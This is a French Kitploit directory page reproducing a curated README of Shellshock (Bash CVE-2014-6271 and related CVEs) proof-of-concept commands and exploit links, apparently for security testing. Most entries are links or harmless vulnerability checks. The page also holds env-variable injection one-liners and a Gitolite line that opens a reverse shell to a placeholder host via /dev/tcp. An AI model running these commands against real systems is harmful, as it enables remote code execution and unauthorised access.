Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
shellshocker-pocs — Collection de preuves de concept et de cibles potentielles pour #ShellShocker | Kitploit
Outils/GitHubGitHub/mubix/shellshocker-pocs
Scanners de VulnérabilitésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRessources Organisées
GitHubmubix/shellshocker-pocs

shellshocker-pocs

Collection de preuves de concept et de cibles potentielles pour #ShellShocker

Voir le dépôt
88919011il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Shellshocker - Dépôt de codes de preuve de concept « Shellshock »

Collection de preuves de concept et de cibles potentielles pour #ShellShocker

Lien Wikipedia : https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details

Merci de soumettre une pull request si vous avez d'autres liens ou ressources

Spéculation : (possiblement vulnérable, non confirmé)

  • XMPP(ejabberd)
  • Mailman - confirmé non vulnérable
  • MySQL
  • NFS
  • Bind9
  • Procmail voir
  • Exim voir
  • Juniper Google Searchinurl:inurl:/dana-na/auth/url_default/welcome.cgi
    • via: https://twitter.com/notsosecure/status/516132301025984512
    • via: http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648&actp=RSS
  • Équipements Cisco
    • via: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
  • FreePB / Asterix corrigé ici

Si vous connaissez des PoC pour l'un de ces éléments, veuillez soumettre une issue ou une pull request avec un lien.

Ligne de commande (Linux, OSX et Windows via Cygwin)

  • bashcheck - script pour tester les dernières vulnérabilités

CVE-2014-6271

  • env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

CVE-2014-7169

si vulnérable, créera un fichier nommé echo dans le répertoire courant contenant la date

  • env X='() { (a)=>\' bash -c "echo date"; cat echo

CVE-2014-7186

  • bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

CVE-2014-7187

  • (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

CVE-2014-6278

  • env X='() { _; } >_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :
  • Informations complémentaires : http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

CVE-2014-6277

provoquera un segfault si vulnérable

  • env X='() { x() { _; }; x() { _; } <<a; }' bash -c :
  • Discussion complémentaire sur fulldisclosure : http://seclists.org/fulldisclosure/2014/Oct/9
  • Informations complémentaires : http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

IBM z/OS -

  • http://mainframed767.tumblr.com/post/98446455927/bad-news-is-it-totally-works-in-bash-on-z-os-and

HTTP

  • Module d'exploitation Metasploit - Injection de code par variable d'environnement Bash dans Apache mod_cgi (Shellshock)
  • Module d'exploitation Metasploit - Injection de code par variable d'environnement Bash dans Advantech Switch (Shellshock)
  • Module d'exploitation Metasploit - Injection par variable d'environnement Bash dans IPFire (Shellshock)
  • Pollution d'en-tête HTTP par @irsdl - http://pastebin.com/QNkf7dYS
  • HTTP CGI-BIN - http://pastebin.com/166f8Rjx
  • cPanel - http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html
  • Digital Alert Systems DASDEC - http://seclists.org/fulldisclosure/2014/Sep/107
  • F5 - https://twitter.com/securifybv/status/515035044294172673
    • https://twitter.com/securifybv/status/515035044294172673/photo/1
    • https://twitter.com/avalidnerd/status/515056463589675008
      • https://twitter.com/avalidnerd/status/515056463589675008/photo/1
  • Invisiblethreat.ca - https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
  • Version en ligne de commande - https://gist.github.com/mfadzilr/70892f43597e7863a8dc
  • Procédure pas à pas basée sur User-Agent avec LiveHTTPHeaders - http://www.lykostech.net/lab-time-exploiting-shellshock-bash-bug-virtual-server/
  • Procédure pas à pas basée sur User-Agent avec Burp - http://oleaass.com/shellshock-proof-of-concept-reverse-shell/
  • Basé sur User-Agent mais prend en charge Tor et Socks5 (Python) - https://github.com/lnxg33k/misc/blob/master/shellshock.py
  • Basé sur User-Agent en Ruby - https://github.com/securusglobal/BadBash
  • Scanner simple basé sur les en-têtes utilisant sleep avec prise en charge du multithreading - https://github.com/gry/shellshock-scanner
  • shocker - Vérifie une liste d'URL dans un fichier, ou une URL unique, par rapport à une liste de ressources CGI vulnérables connues (méthode Content-type)
  • Xymon - https://lists.xymon.com/archive/2014-September/040350.html
  • QNAP - https://www.exploit-db.com/exploits/36503

Phusion Passenger

  • https://news.ycombinator.com/item?id=8369776

DHCP

  • Exploitation de TrustedSec via Tftpd32 - https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
  • Module d'exploitation Metasploit - Injection par variable d'environnement Bash dans Dhclient (Shellshock)
  • Module auxiliaire Metasploit - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/dhclient_bash_env.rb
  • Script Perl - http://pastebin.com/S1WVzTv9
  • utilisation d'un Wi-Fi Pineapple pour forcer les gens à rejoindre le réseau - http://d.uijn.nl/?p=32

SSH

  • Stack Overflow - http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
  • SSH ForcedCommand - https://twitter.com/JZdziarski/status/515205581226123264
    • https://twitter.com/JZdziarski/status/515205581226123264/photo/1
  • SendEnv: LC_X='() { :; }; echo vulnerable' ssh [email protected] -o SendEnv=LC_X
  • Gitolite - https://twitter.com/Grifo/status/515089986161766400
    • $ ssh GITOLITEUSER@VULNERABLEIP '() { ignore;}; /bin/bash -i >& /dev/tcp/REVERSESHELLIP/PORT 0>&1'
    • (nécessite d'avoir un compte git sur le serveur)

OSX

  • Élévation de privilèges via VMware Fusion - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb
  • Correctif : http://support.apple.com/kb/DL1769

OSX - avec DNS inversé (CVE-2014-3671.txt)

  • Exemple de fichier de zone : in-addr.arpa contenant un exemple CVE-2014-6271.
  • Exemple de fichier avec un getnameinfo() qui transmet à setenv() : osx-rev-ptr.c
  • Avis avec description de ce qui précède CVE-2014-3671.txt

SIP

  • Proxies SIP : https://github.com/zaf/sipshock

Qmail

  • Procédure pas à pas détaillée - http://marc.info/?l=qmail&m=141183309314366&w=2
  • Tweet de @ymzkei5 - http://twitter.com/ymzkei5/status/515328039765307392
    • http://twitpic.com/ec3615
    • http://twitpic.com/ec361o

Postfix

  • http://packetstormsecurity.com/files/128572/postfixsmtp-shellshock.txt

FTP

  • Pure-FTPd : https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc
  • Module d'exploitation Metasploit - Injection de code par variable d'environnement Bash dans l'authentification externe Pure-FTPd (Shellshock)

OpenVPN

  • OpenVPN - https://news.ycombinator.com/item?id=8385332
  • Procédure pas à pas du PoC par @fj33r - http://sprunge.us/BGjP
Télécharger l’outil